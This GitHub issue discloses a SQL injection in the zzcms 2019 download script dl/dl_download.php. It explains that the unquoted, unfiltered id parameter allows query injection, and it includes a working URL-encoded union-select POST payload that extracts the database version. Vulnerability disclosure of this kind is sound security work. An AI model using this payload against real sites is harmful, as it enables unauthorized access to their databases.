Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

zzcms 2019 dl/dl_download.php SQL injection #4

Open
cby234 opened this issue May 22, 2019 · 0 comments
Open

zzcms 2019 dl/dl_download.php SQL injection #4

cby234 opened this issue May 22, 2019 · 0 comments

Comments

@cby234
Copy link
Owner

cby234 commented May 22, 2019

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)

image

If index of ',' value in id parameter is bigger than 0 sql will be

image

When we check the query there is no single quote to id parameter. So We can inject
any query with id parameter

image

We can find there is no security filter for id parameter and it means we can inject Sql query via
id parameter if we concat ',' value at the end of id parameter

0x02 payload

give below "POC" value for post data in "/dl/dl_download.php"

POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

image

image

@cby234 cby234 closed this as completed May 22, 2019
@cby234 cby234 changed the title zzcms_2019_SQL_INJECTION(dl/dl_download.php) zzcms 2019 dl/dl_download.php SQL_INJECTION May 22, 2019
@cby234 cby234 changed the title zzcms 2019 dl/dl_download.php SQL_INJECTION zzcms 2019 dl/dl_download.php SQL injection May 22, 2019
@cby234 cby234 reopened this Jun 1, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant